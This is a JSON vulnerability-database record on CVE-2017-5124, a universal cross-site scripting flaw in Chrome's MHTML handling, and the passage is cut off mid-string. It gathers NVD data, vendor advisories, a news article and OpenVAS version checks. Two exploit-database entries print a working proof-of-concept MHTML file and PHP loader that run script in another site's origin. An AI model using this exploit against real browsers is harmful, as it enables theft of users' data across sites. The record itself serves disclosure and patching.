{"cve": [{"lastseen": "2021-02-02T06:36:47", "description": "Incorrect application of sandboxing in Blink in Google Chrome prior to 62.0.3202.62 allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted MHTML page.", "edition": 14, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2018-02-07T23:29:00", "title": "CVE-2017-5124", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5124"], "modified": "2018-02-23T15:54:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2017-5124", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5124", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*"]}], "seebug": [{"lastseen": "2017-11-19T12:00:25", "description": "No description provided by source.", "published": "2017-11-16T00:00:00", "type": "seebug", "title": "Chrome < 62 UXSS(CVE-2017-5124)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5124"], "modified": "2017-11-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96867", "id": "SSV:96867", "sourceData": "\n PoC.mht\r\n-------------------------\r\nMIME-Version: 1.0\r\nContent-Type: multipart/related;\r\n\ttype=\"text/html\";\r\n\tboundary=\"----MultipartBoundary--\"\r\nCVE-2017-5124\r\n\r\n------MultipartBoundary--\r\nContent-Type: application/xml;\r\n\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<?xml-stylesheet type=\"text/xml\" href=\"#stylesheet\"?>\r\n<!DOCTYPE catalog [\r\n<!ATTLIST xsl:stylesheet\r\nid ID #REQUIRED>\r\n]>\r\n<xsl:stylesheet id=\"stylesheet\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\">\r\n<xsl:template match=\"*\">\r\n<html><iframe style=\"display:none\" src=\"https://google.com\"></iframe></html>\r\n</xsl:template>\r\n</xsl:stylesheet>\r\n\r\n------MultipartBoundary--\r\nContent-Type: text/html\r\nContent-Location: https://google.com\r\n\r\n<script>alert('Location origin: '+location.origin)</script>\r\n------MultipartBoundary----\r\n------------------------\r\n\r\nPoC.php\r\n-------------------------\r\n<?php\r\n$filename=realpath(\"PoC.mht\");\r\nheader( \"Content-type: multipart/related\");\r\nreadfile($filename);\r\n?>\r\n------------------------\r\n\n ", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-96867"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:55", "description": "\nWebkit (Chome 61) - MHTML Universal Cross-site Scripting", "edition": 1, "published": "2017-10-03T00:00:00", "title": "Webkit (Chome 61) - MHTML Universal Cross-site Scripting", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5124"], "modified": "2017-10-03T00:00:00", "id": "EXPLOITPACK:8C5D4DC8DAECD4432DFF69AD675AEE53", "href": "", "sourceData": "<?php\n$filename=realpath(\"PoC.mht\");\nheader( \"Content-type: multipart/related\");\nreadfile($filename);\n?>\n\n\n\n\nMIME-Version: 1.0\nContent-Type: multipart/related;\n\ttype=\"text/html\";\n\tboundary=\"----MultipartBoundary--\"\nCVE-2017-5124\n\n------MultipartBoundary--\nContent-Type: application/xml;\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<?xml-stylesheet type=\"text/xml\" href=\"#stylesheet\"?>\n<!DOCTYPE catalog [\n<!ATTLIST xsl:stylesheet\nid ID #REQUIRED>\n]>\n<xsl:stylesheet id=\"stylesheet\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\">\n<xsl:template match=\"*\">\n<html><iframe style=\"display:none\" src=\"https://google.com\"></iframe></html>\n</xsl:template>\n</xsl:stylesheet>\n\n------MultipartBoundary--\nContent-Type: text/html\nContent-Location: https://google.com\n\n<script>alert('Location origin: '+location.origin)</script>\n------MultipartBoundary----", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "threatpost": [{"lastseen": "2019-01-23T05:28:19", "bulletinFamily": "info", "cvelist": ["CVE-2017-15396", "CVE-2017-5124"], "description": "**UPDATE** Google is urging users to update their Chrome desktop browsers to avoid security issues related to a high-severity stack-based buffer overflow vulnerability. Google issued the alert Thursday and said an update for most browsers has been released.\n\n\u201cThe stable channel has been updated to 62.0.3202.75 for Windows, Mac and Linux which will roll out over the coming days/weeks,\u201d wrote Abdul Syed, a Google Chrome engineer, in a security bulletin to [Google\u2019s Chrome Release blog](<https://chromereleases.googleblog.com/2017/10/stable-channel-update-for-desktop_26.html>).\n\nThe bug is tied to the browser\u2019s Chrome V8 open-source JavaScript engine used on Windows 7 and later, macOS 10.5 and later and Linux systems that use processors Intel Architecture 32-bit (i386), ARM or MIPS, [according to Google](<https://developers.google.com/v8/>).\n\nGoogle is not releasing any details surrounding this stack buffer overflow vulnerability (CVE-2017-15396) stating, \u201caccess to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain (disclosure) restrictions if the bug exists in a third party library that other projects similarly depend on, but haven\u2019t yet fixed.\u201d Chrome V8 is written in C++ and in Node.js and can be embedded into any C++ applications or can run standalone, according to Google.\n\nThis type of bug typically allows attackers to execute arbitrary code within the context of a targeted application. A failed exploit attempt causes a denial-of-service condition, according to an [OWASP Foundation](<https://www.owasp.org/index.php/Main_Page>) description of the vulnerability.\n\nAccording to an analysis of the vulnerability by researchers at Risk Based Security, the flaw is in the International Components for Unicode for C/C++, which is a library used by V8. \u201cUltimately, while it does affected V8 and Chrome, the flawed code is not Google\u2019s,\u201d according to Risk Based Security. The vulnerability, a \u201cNUL-terminated buffer handling buffer overflow, was made public Oct. 11, according to the firm.\n\nThe bug was reported by researcher Yu Zhou, of Ant-Financial Light-Year Security Lab on Sept. 30. He was awarded $3,000 for the discovery through Google\u2019s bug bounty program.\n\n[In December of 2016](<https://threatpost.com/google-fixes-12-high-severity-flaws-in-chrome-browser/122223/>), Google also addressed high-severity vulnerabilities in Chrome\u2019s V8 JavaScript engine. One of the flaws is described as a \u201cprivate property access in V8\u201d vulnerability. The other V8 issue is a use after free vulnerability in V8.\n\nThe United States Computer Emergency Readiness Team issued an alert for the buffer overflow [vulnerability on Friday](<https://www.us-cert.gov/ncas/current-activity/2017/10/26/Google-Releases-Security-Update-Chrome>).\n\nOn Thursday Google also released an update for Chrome for Android (62.0.3202.73) that fixes a memory leak bug and a \u201cmajor crash issue,\u201d [according the advisory](<https://chromereleases.googleblog.com/2017/10/chrome-for-android-has-been-updated-to.html>).\n\nGoogle had previously updated the desktop [Chrome 62 browser on Oct. 17](<https://chromereleases.googleblog.com/2017/10/stable-channel-update-for-desktop.html>). That update (62.0.3202.62) included 35 security updates, eight rated high severity and seven ranked medium. The largest bug bounty payout was $8,837 for a UXSS with HHTML vulnerability (CVE-2017-5124) and paid to an anonymous researcher. The flaw, [according to a Red Hat description](<https://access.redhat.com/errata/RHSA-2017:2997>), is \u201cfound in the processing of malformed web content. A web page containing malicious content could cause Chromium to crash, execute arbitrary code, or disclose sensitive information when visited by the victim.\u201d\n\n(_Article was updated with additional analysis by Risk Based Security on Oct. 27 at 5:30 pm ET_)\n", "modified": "2017-10-27T12:28:13", "published": "2017-10-27T12:28:13", "id": "THREATPOST:3CA10850AC14EA4F7055A21FCE8DB99F", "href": "https://threatpost.com/google-patches-high-severity-browser-bug/128661/", "type": "threatpost", "title": "Google Patches \u2018High Severity\u2019 Browser Bug", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "archlinux": [{"lastseen": "2020-09-22T18:36:42", "bulletinFamily": "unix", "cvelist": ["CVE-2017-15386", "CVE-2017-15387", "CVE-2017-15388", "CVE-2017-15390", "CVE-2017-15392", "CVE-2017-15394", "CVE-2017-5124", "CVE-2017-5126", "CVE-2017-5127", "CVE-2017-5128", "CVE-2017-5129", "CVE-2017-5132", "CVE-2017-5133"], "description": "Arch Linux Security Advisory ASA-201712-6\n=========================================\n\nSeverity: Critical\nDate : 2017-12-13\nCVE-ID : CVE-2017-15386 CVE-2017-15387 CVE-2017-15388 CVE-2017-15390\nCVE-2017-15392 CVE-2017-15394 CVE-2017-5124 CVE-2017-5126\nCVE-2017-5127 CVE-2017-5128 CVE-2017-5129 CVE-2017-5132\nCVE-2017-5133\nPackage : qt5-webengine\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-545\n\nSummary\n=======\n\nThe package qt5-webengine before version 5.10.0-1 is vulnerable to\nmultiple issues including arbitrary code execution, cross-site\nscripting, access restriction bypass, content spoofing and information\ndisclosure.\n\nResolution\n==========\n\nUpgrade to 5.10.0-1.\n\n# pacman -Syu \"qt5-webengine>=5.10.0-1\"\n\nThe problems have been fixed upstream in version 5.10.0.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2017-15386 (content spoofing)\n\nA UI spoofing issue has been found in the Blink component of the\nChromium browser < 62.0.3202.62.\n\n- CVE-2017-15387 (access restriction bypass)\n\nA content security bypass has been found in the Chromium browser <\n62.0.3202.62.\n\n- CVE-2017-15388 (information disclosure)\n\nAn out-of-bounds read has been found in the Skia component of the\nChromium browser < 62.0.3202.62.\n\n- CVE-2017-15390 (content spoofing)\n\nA URL spoofing issue has been found in the Omnibox component of the\nChromium browser < 62.0.3202.62.\n\n- CVE-2017-15392 (access restriction bypass)\n\nAn incorrect registry key handling issue has been found in the\nPlatformIntegration component of the Chromium browser < 62.0.3202.62.\n\n- CVE-2017-15394 (content spoofing)\n\nA URL spoofing flaw has been found in the extensions UI of the Chromium\nbrowser < 62.0.3202.62.\n\n- CVE-2017-5124 (cross-site scripting)\n\nA universal XSS flaw has been found in the MHTML component of the\nChromium browser < 62.0.3202.62.\n\n- CVE-2017-5126 (arbitrary code execution)\n\nA use-after-free security issue has been found in the PDFium component\nof the Chromium browser < 62.0.3202.62.\n\n- CVE-2017-5127 (arbitrary code execution)\n\nA use-after-free security issue has been found in the PDFium component\nof the Chromium browser < 62.0.3202.62.\n\n- CVE-2017-5128 (arbitrary code execution)\n\nA heap overflow security issue has been found in the WebGL component of\nthe Chromium browser < 62.0.3202.62.\n\n- CVE-2017-5129 (arbitrary code execution)\n\nA use-after-free security issue has been found in the WebAudio\ncomponent of the Chromium browser < 62.0.3202.62.\n\n- CVE-2017-5132 (arbitrary code execution)\n\nAn incorrect stack manipulation security issue has been found in the\nWebAssembly component of the Chromium browser < 62.0.3202.62.\n\n- CVE-2017-5133 (arbitrary code execution)\n\nAn out-of-bounds write has been found in the Skia component of the\nChromium browser < 62.0.3202.62.\n\nImpact\n======\n\nA remote attacker can bypass security measures, trick the user by\nspoofing parts of the UI, cause a denial of service or execute\narbitrary code on the affected host.\n\nReferences\n==========\n\nhttps://github.com/qt/qtwebengine/blob/5.10/dist/changes-5.10.0#L37\nhttps://chromereleases.googleblog.com/2017/10/stable-channel-update-for-desktop.html\nhttps://crbug.com/752003\nhttps://crbug.com/756040\nhttps://crbug.com/756563\nhttps://crbug.com/750239\nhttps://crbug.com/714401\nhttps://crbug.com/745580\nhttps://crbug.com/762930\nhttps://crbug.com/760455\nhttps://crbug.com/765384\nhttps://crbug.com/765469\nhttps://crbug.com/765495\nhttps://crbug.com/718858\nhttps://crbug.com/762106\nhttps://security.archlinux.org/CVE-2017-15386\nhttps://security.archlinux.org/CVE-2017-15387\nhttps://security.archlinux.org/CVE-2017-15388\nhttps://security.archlinux.org/CVE-2017-15390\nhttps://security.archlinux.org/CVE-2017-15392\nhttps://security.archlinux.org/CVE-2017-15394\nhttps://security.archlinux.org/CVE-2017-5124\nhttps://security.archlinux.org/CVE-2017-5126\nhttps://security.archlinux.org/CVE-2017-5127\nhttps://security.archlinux.org/CVE-2017-5128\nhttps://security.archlinux.org/CVE-2017-5129\nhttps://security.archlinux.org/CVE-2017-5132\nhttps://security.archlinux.org/CVE-2017-5133", "modified": "2017-12-13T00:00:00", "published": "2017-12-13T00:00:00", "id": "ASA-201712-6", "href": "https://security.archlinux.org/ASA-201712-6", "type": "archlinux", "title": "[ASA-201712-6] qt5-webengine: multiple issues", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-22T18:36:42", "bulletinFamily": "unix", "cvelist": ["CVE-2017-15386", "CVE-2017-15387", "CVE-2017-15388", "CVE-2017-15389", "CVE-2017-15390", "CVE-2017-15391", "CVE-2017-15392", "CVE-2017-15393", "CVE-2017-15394", "CVE-2017-15395", "CVE-2017-5124", "CVE-2017-5125", "CVE-2017-5126", "CVE-2017-5127", "CVE-2017-5128", "CVE-2017-5129", "CVE-2017-5130", "CVE-2017-5131", "CVE-2017-5132", "CVE-2017-5133"], "description": "Arch Linux Security Advisory ASA-201710-27\n==========================================\n\nSeverity: Critical\nDate : 2017-10-19\nCVE-ID : CVE-2017-15386 CVE-2017-15387 CVE-2017-15388 CVE-2017-15389\nCVE-2017-15390 CVE-2017-15391 CVE-2017-15392 CVE-2017-15393\nCVE-2017-15394 CVE-2017-15395 CVE-2017-5124 CVE-2017-5125\nCVE-2017-5126 CVE-2017-5127 CVE-2017-5128 CVE-2017-5129\nCVE-2017-5130 CVE-2017-5131 CVE-2017-5132 CVE-2017-5133\nPackage : chromium\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-456\n\nSummary\n=======\n\nThe package chromium before version 62.0.3202.62-1 is vulnerable to\nmultiple issues including arbitrary code execution, cross-site\nscripting, access restriction bypass, content spoofing, information\ndisclosure and denial of service.\n\nResolution\n==========\n\nUpgrade to 62.0.3202.62-1.\n\n# pacman -Syu \"chromium>=62.0.3202.62-1\"\n\nThe problems have been fixed upstream in version 62.0.3202.62.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2017-15386 (content spoofing)\n\nA UI spoofing issue has been found in the Blink component of the\nChromium browser < 62.0.3202.62.\n\n- CVE-2017-15387 (access restriction bypass)\n\nA content security bypass has been found in the Chromium browser <\n62.0.3202.62.\n\n- CVE-2017-15388 (information disclosure)\n\nAn out-of-bounds read has been found in the Skia component of the\nChromium browser < 62.0.3202.62.\n\n- CVE-2017-15389 (content spoofing)\n\nA URL spoofing issue has been found in the Omnibox component of the\nChromium browser < 62.0.3202.62.\n\n- CVE-2017-15390 (content spoofing)\n\nA URL spoofing issue has been found in the Omnibox component of the\nChromium browser < 62.0.3202.62.\n\n- CVE-2017-15391 (access restriction bypass)\n\nAn extension limitation bypass has been found in the Extensions\ncomponent of the Chromium browser < 62.0.3202.62.\n\n- CVE-2017-15392 (access restriction bypass)\n\nAn incorrect registry key handling issue has been found in the\nPlatformIntegration component of the Chromium browser < 62.0.3202.62.\n\n- CVE-2017-15393 (information disclosure)\n\nA referrer leak has been found in the Devtools component of the\nChromium browser < 62.0.3202.62.\n\n- CVE-2017-15394 (content spoofing)\n\nA URL spoofing flaw has been found in the extensions UI of the Chromium\nbrowser < 62.0.3202.62.\n\n- CVE-2017-15395 (denial of service)\n\nA null-pointer dereference flaw has been found in the ImageCapture\ncomponent of the Chromium browser < 62.0.3202.62.\n\n- CVE-2017-5124 (cross-site scripting)\n\nA universal XSS flaw has been found in the MHTML component of the\nChromium browser < 62.0.3202.62.\n\n- CVE-2017-5125 (arbitrary code execution)\n\nA heap overflow security issue has been found in the Skia component of\nthe Chromium browser < 62.0.3202.62.\n\n- CVE-2017-5126 (arbitrary code execution)\n\nA use-after-free security issue has been found in the PDFium component\nof the Chromium browser < 62.0.3202.62.\n\n- CVE-2017-5127 (arbitrary code execution)\n\nA use-after-free security issue has been found in the PDFium component\nof the Chromium browser < 62.0.3202.62.\n\n- CVE-2017-5128 (arbitrary code execution)\n\nA heap overflow security issue has been found in the WebGL component of\nthe Chromium browser < 62.0.3202.62.\n\n- CVE-2017-5129 (arbitrary code execution)\n\nA use-after-free security issue has been found in the WebAudio\ncomponent of the Chromium browser < 62.0.3202.62.\n\n- CVE-2017-5130 (arbitrary code execution)\n\nA heap overflow security issue has been found in libxml2.\n\n- CVE-2017-5131 (arbitrary code execution)\n\nAn out-of-bounds write has been found in the Skia component of the\nChromium browser < 62.0.3202.62.\n\n- CVE-2017-5132 (arbitrary code execution)\n\nAn incorrect stack manipulation security issue has been found in the\nWebAssembly component of the Chromium browser < 62.0.3202.62.\n\n- CVE-2017-5133 (arbitrary code execution)\n\nAn out-of-bounds write has been found in the Skia component of the\nChromium browser < 62.0.3202.62.\n\nImpact\n======\n\nA remote attacker can bypass security measures, trick the user by\nspoofing parts of the UI, cause a denial of service or execute\narbitrary code on the affected host.\n\nReferences\n==========\n\nhttps://chromereleases.googleblog.com/2017/10/stable-channel-update-for-desktop.html\nhttps://crbug.com/752003\nhttps://crbug.com/756040\nhttps://crbug.com/756563\nhttps://crbug.com/739621\nhttps://crbug.com/750239\nhttps://crbug.com/598265\nhttps://crbug.com/714401\nhttps://crbug.com/732751\nhttps://crbug.com/745580\nhttps://crbug.com/759457\nhttps://crbug.com/762930\nhttps://crbug.com/749147\nhttps://crbug.com/760455\nhttps://crbug.com/765384\nhttps://crbug.com/765469\nhttps://crbug.com/765495\nhttps://crbug.com/722079\nhttps://crbug.com/744109\nhttps://crbug.com/718858\nhttps://crbug.com/762106\nhttps://security.archlinux.org/CVE-2017-15386\nhttps://security.archlinux.org/CVE-2017-15387\nhttps://security.archlinux.org/CVE-2017-15388\nhttps://security.archlinux.org/CVE-2017-15389\nhttps://security.archlinux.org/CVE-2017-15390\nhttps://security.archlinux.org/CVE-2017-15391\nhttps://security.archlinux.org/CVE-2017-15392\nhttps://security.archlinux.org/CVE-2017-15393\nhttps://security.archlinux.org/CVE-2017-15394\nhttps://security.archlinux.org/CVE-2017-15395\nhttps://security.archlinux.org/CVE-2017-5124\nhttps://security.archlinux.org/CVE-2017-5125\nhttps://security.archlinux.org/CVE-2017-5126\nhttps://security.archlinux.org/CVE-2017-5127\nhttps://security.archlinux.org/CVE-2017-5128\nhttps://security.archlinux.org/CVE-2017-5129\nhttps://security.archlinux.org/CVE-2017-5130\nhttps://security.archlinux.org/CVE-2017-5131\nhttps://security.archlinux.org/CVE-2017-5132\nhttps://security.archlinux.org/CVE-2017-5133", "modified": "2017-10-19T00:00:00", "published": "2017-10-19T00:00:00", "id": "ASA-201710-27", "href": "https://security.archlinux.org/ASA-201710-27", "type": "archlinux", "title": "[ASA-201710-27] chromium: multiple issues", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1538", "CVE-2017-15386", "CVE-2017-15387", "CVE-2017-15390", "CVE-2017-15392", "CVE-2017-15394", "CVE-2017-15396", "CVE-2017-5124", "CVE-2017-5126", "CVE-2017-5127", "CVE-2017-5128", "CVE-2017-5129", "CVE-2017-5132", "CVE-2017-5133"], "description": "Qt5 - QtWebEngine components. ", "modified": "2017-12-04T21:33:47", "published": "2017-12-04T21:33:47", "id": "FEDORA:B171E6087BC3", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: qt5-qtwebengine-5.9.3-1.fc25", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1538", "CVE-2017-15386", "CVE-2017-15387", "CVE-2017-15390", "CVE-2017-15392", "CVE-2017-15394", "CVE-2017-15396", "CVE-2017-5124", "CVE-2017-5126", "CVE-2017-5127", "CVE-2017-5128", "CVE-2017-5129", "CVE-2017-5132", "CVE-2017-5133"], "description": "Qt5 - QtWebEngine components. ", "modified": "2017-12-04T19:05:29", "published": "2017-12-04T19:05:29", "id": "FEDORA:01AED601B23D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: qt5-qtwebengine-5.9.3-1.fc27", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1538", "CVE-2017-15386", "CVE-2017-15387", "CVE-2017-15390", "CVE-2017-15392", "CVE-2017-15394", "CVE-2017-15396", "CVE-2017-5124", "CVE-2017-5126", "CVE-2017-5127", "CVE-2017-5128", "CVE-2017-5129", "CVE-2017-5132", "CVE-2017-5133"], "description": "Qt5 - QtWebEngine components. ", "modified": "2017-12-04T20:15:44", "published": "2017-12-04T20:15:44", "id": "FEDORA:546436087815", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: qt5-qtwebengine-5.9.3-1.fc26", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-15386", "CVE-2017-15387", "CVE-2017-15388", "CVE-2017-15389", "CVE-2017-15390", "CVE-2017-15391", "CVE-2017-15392", "CVE-2017-15393", "CVE-2017-15394", "CVE-2017-15395", "CVE-2017-15398", "CVE-2017-15399", "CVE-2017-5124", "CVE-2017-5125", "CVE-2017-5126", "CVE-2017-5127", "CVE-2017-5128", "CVE-2017-5129", "CVE-2017-5130", "CVE-2017-5131", "CVE-2017-5132", "CVE-2017-5133"], "description": "Chromium is an open-source web browser, powered by WebKit (Blink). ", "modified": "2017-11-15T18:00:09", "published": "2017-11-15T18:00:09", "id": "FEDORA:9BDC560D1C95", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: chromium-62.0.3202.89-1.fc27", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-15386", "CVE-2017-15387", "CVE-2017-15388", "CVE-2017-15389", "CVE-2017-15390", "CVE-2017-15391", "CVE-2017-15392", "CVE-2017-15393", "CVE-2017-15394", "CVE-2017-15395", "CVE-2017-15398", "CVE-2017-15399", "CVE-2017-15407", "CVE-2017-15408", "CVE-2017-15409", "CVE-2017-15410", "CVE-2017-15411", "CVE-2017-15412", "CVE-2017-15413", "CVE-2017-15415", "CVE-2017-15416", "CVE-2017-15417", "CVE-2017-15418", "CVE-2017-15419", "CVE-2017-15420", "CVE-2017-15422", "CVE-2017-15423", "CVE-2017-15424", "CVE-2017-15425", "CVE-2017-15426", "CVE-2017-15427", "CVE-2017-15429", "CVE-2017-5124", "CVE-2017-5125", "CVE-2017-5126", "CVE-2017-5127", "CVE-2017-5128", "CVE-2017-5129", "CVE-2017-5130", "CVE-2017-5131", "CVE-2017-5132", "CVE-2017-5133"], "description": "Chromium is an open-source web browser, powered by WebKit (Blink). ", "modified": "2018-01-01T22:22:45", "published": "2018-01-01T22:22:45", "id": "FEDORA:EC7F86046254", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: chromium-63.0.3239.108-1.fc26", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:34:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5128", "CVE-2017-5132", "CVE-2017-15390", "CVE-2017-5133", "CVE-2017-15392", "CVE-2017-15387", "CVE-2017-5126", "CVE-2017-5127", "CVE-2017-15398", "CVE-2017-15386", "CVE-2017-15396", "CVE-2017-15388", "CVE-2017-5129", "CVE-2017-15394", "CVE-2017-5124"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-12-05T00:00:00", "id": "OPENVAS:1361412562310873861", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873861", "type": "openvas", "title": "Fedora Update for qt5-qtwebengine FEDORA-2017-9015553e3d", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_9015553e3d_qt5-qtwebengine_fc25.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for qt5-qtwebengine FEDORA-2017-9015553e3d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873861\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-05 07:55:59 +0100 (Tue, 05 Dec 2017)\");\n script_cve_id(\"CVE-2017-5124\", \"CVE-2017-5126\", \"CVE-2017-5127\", \"CVE-2017-5128\",\n \"CVE-2017-5129\", \"CVE-2017-5132\", \"CVE-2017-5133\", \"CVE-2017-15386\",\n \"CVE-2017-15387\", \"CVE-2017-15388\", \"CVE-2017-15390\", \"CVE-2017-15392\",\n \"CVE-2017-15394\", \"CVE-2017-15396\", \"CVE-2017-15398\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for qt5-qtwebengine FEDORA-2017-9015553e3d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'qt5-qtwebengine'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"qt5-qtwebengine on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-9015553e3d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PV5SHF6ZBHA5FUALPQE2YT7FP2Q6LUWO\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"qt5-qtwebengine\", rpm:\"qt5-qtwebengine~5.9.3~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5128", "CVE-2017-5132", "CVE-2017-15390", "CVE-2017-5133", "CVE-2017-15392", "CVE-2017-15387", "CVE-2017-5126", "CVE-2017-5127", "CVE-2017-15398", "CVE-2017-15386", "CVE-2017-15396", "CVE-2017-15388", "CVE-2017-5129", "CVE-2017-15394", "CVE-2017-5124"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-12-05T00:00:00", "id": "OPENVAS:1361412562310873856", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873856", "type": "openvas", "title": "Fedora Update for qt5-qtwebengine FEDORA-2017-15b815b9b7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_15b815b9b7_qt5-qtwebengine_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for qt5-qtwebengine FEDORA-2017-15b815b9b7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in 